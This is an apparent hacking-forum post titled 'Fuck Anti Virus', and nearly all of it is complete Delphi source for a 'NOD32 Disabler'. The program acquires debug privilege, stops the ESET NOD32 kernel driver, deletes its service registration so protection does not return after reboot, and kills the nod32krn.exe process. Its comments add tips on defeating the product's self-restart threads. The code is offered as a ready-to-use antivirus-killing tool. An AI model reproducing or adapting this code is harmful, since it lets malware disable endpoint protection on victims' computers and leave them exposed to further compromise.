Fuck Anti Virus - Nod32 Disabler

Код:
Program AntiNod32; 

{ 

   NOD32 Disabler by FuXdas aka CyberPunk 

   13/09/2006 

   --------------------------------------- 



} 



{$APPTYPE CONSOLE} 



Uses Windows, TLHelp32, WinSvc; 



Const 

  Welcome = ' Coded by FuXdas ~ [email protected]'+#13#10+ 

            ' www.instinctcoders.com'+#13#10+#13#10+ 

            ' WARNING!!, This Application demonstrate how disable NOD32 Protection.'+#13#10+ 

            ' Source code is included, Tested on NOD32 NT version, '+#13#10+ 

            ' Type yes if u want to disable NOD32 protection'+#13#10; 



  PROCESS_TERMINATE = $0001; 

  DrvName: PChar = 'AMON';  // Nod32 core Kernel Driver 

  SrvName: PChar = 'nod32krn.exe'; 



//--- We will stop the nod driver with this function 

// Nod that it work like Services 

Function StopNodDriver(): Boolean; 

Var 

  SCManager, Service: SC_Handle; 

  ServiceStatus: TServiceStatus; 

Begin 

  Result := False; 

  SCManager := OpenSCManager(Nil, Nil, SC_MANAGER_CONNECT); 

  If SCManager = 0 Then Exit; 

  Try 

    Service := OpenService(SCManager, PChar(DrvName), SERVICE_STOP); 

    If ControlService(Service, SERVICE_CONTROL_STOP, ServiceStatus) Then 

      Result := True; 

    CloseServiceHandle(Service); 

  Finally 

    CloseServiceHandle(SCManager); 

  End; 

End; 

//Unregistring nod's driver 

// This will remove driver's keys from registry 

Function UnrNodDrv(): Boolean; 

Var 

  SCManager, Service: SC_Handle; 

Begin 

  Result := False; 

  SCManager := OpenSCManager(Nil, Nil, SC_MANAGER_CONNECT); 

  If SCManager = 0 Then Exit; 

  Try 

    Service := OpenService(SCManager, PChar(DrvName), STANDARD_RIGHTS_REQUIRED); 

    If Service <> 0 Then 

      If DeleteService(Service) Then 

        Result := True; 

    CloseServiceHandle(Service); 

  Finally 

    CloseServiceHandle(SCManager); 

  End; 

End; 



//- we will need some privilege 

procedure SetTokenPrivileges; 

var 

  hToken1, hToken2, hToken3: THandle; 

  TokenPrivileges: TTokenPrivileges; 

  Version: OSVERSIONINFO; 

begin 

  Version.dwOSVersionInfoSize := SizeOf(OSVERSIONINFO); 

  GetVersionEx(Version); 

  if Version.dwPlatformId <> VER_PLATFORM_WIN32_WINDOWS then 

  begin 

    try 

      OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, hToken1); 

      hToken2 := hToken1; 

      LookupPrivilegeValue(nil, 'SeDebugPrivilege', TokenPrivileges.Privileges[0].luid); 

      TokenPrivileges.PrivilegeCount := 1; 

      TokenPrivileges.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED; 

      hToken3 := 0; 

      AdjustTokenPrivileges(hToken1, False, TokenPrivileges, 0, PTokenPrivileges(nil)^, hToken3); 

      TokenPrivileges.PrivilegeCount := 1; 

      TokenPrivileges.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED; 

      hToken3 := 0; 

      AdjustTokenPrivileges(hToken2, False, TokenPrivileges, 0, PTokenPrivileges(nil)^, hToken3); 

      CloseHandle(hToken1); 

    except; 

    end; 

  end; 

end; 



Function ExtractFileName(s: String): String; 

Var i, j: integer; 

Begin 

  j := 0; 

  For i := 1 To length(s) Do 

    If (s[i] = '\') Then j := i; 

  result := copy(s, j + 1, length(s)); 

End; 



//--- Yeah killing Nod's services 

//After stoping Nod's driver we need to kill the service 

// And like this nod32krn.exe will need to load the driver, but can't because the driver is stoped 

//-- By the way after some research I have found that Nod injects 2 or 3 threads in 'services.exe' 

// and like this if killed, it will be restarted by the remote thread. 

// so if u want to completly kill nod's service u must kill the 2 threads in 'services.exe' 

Function KillNod32(): integer; 

Var 

  ContinueLoop: BOOL; 

  FSnapshotHandle: THandle; 

  FProcessEntry32: TProcessEntry32; 

Begin 

  result := 0; 

  SetTokenPrivileges; 

  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 

  FProcessEntry32.dwSize := Sizeof(FProcessEntry32); 

  ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32); 

  While integer(ContinueLoop) <> 0 Do 

  Begin 

    If (ExtractFileName(FProcessEntry32.szExeFile)) = SrvName Then 

      Result := Integer(TerminateProcess(OpenProcess( 

        PROCESS_TERMINATE, BOOL(0), 

        FProcessEntry32.th32ProcessID), 0)); 

    ContinueLoop := Process32Next(FSnapshotHandle, 

      FProcessEntry32); 

  End; 

  CloseHandle(FSnapshotHandle); 

End; 



var 

  s:string; 

Begin 

//- yep just to demonstrate, )) u can remove all that shits 

/// 

  WriteLn(welcome); 

  ReadLn(s); 

  If s = 'yes' then 

  Begin 

  //-- This one is the most important we must stop the driver 

  If StopNodDriver() Then 

    WriteLn(' Stoping Nod32 driver ok ') 

  Else 

  Begin 

    WriteLn(' Failed to stop Nod32 driver,any key to continue....'); 

    Readln; 

  End; 

    //-- u can remove this function if u want that nod that start in the next boot 

    /// 

  If UnrNodDrv() Then 

    WriteLn(' Unregistring Nod32 driver ok') 

  Else 

  Begin 

    WriteLn(' Error while trying to Unregister Nod32 Driver,any key to continue...'); 

    ReadLn; 

  End; 

  Asm 

     Call KillNod32 //;)) 

     // After this the NOD's realtime protection will be disabled completly 

     // and we don't need a reboot 

     //- and if u use StopNodDriver() nod will be disabled also after the reb0ot 

     // So be carefull 



  End; 

end; 

readln 

// Cya FuXdas 

// contact: [email protected] 

//          www.instinctcoders.com 

End.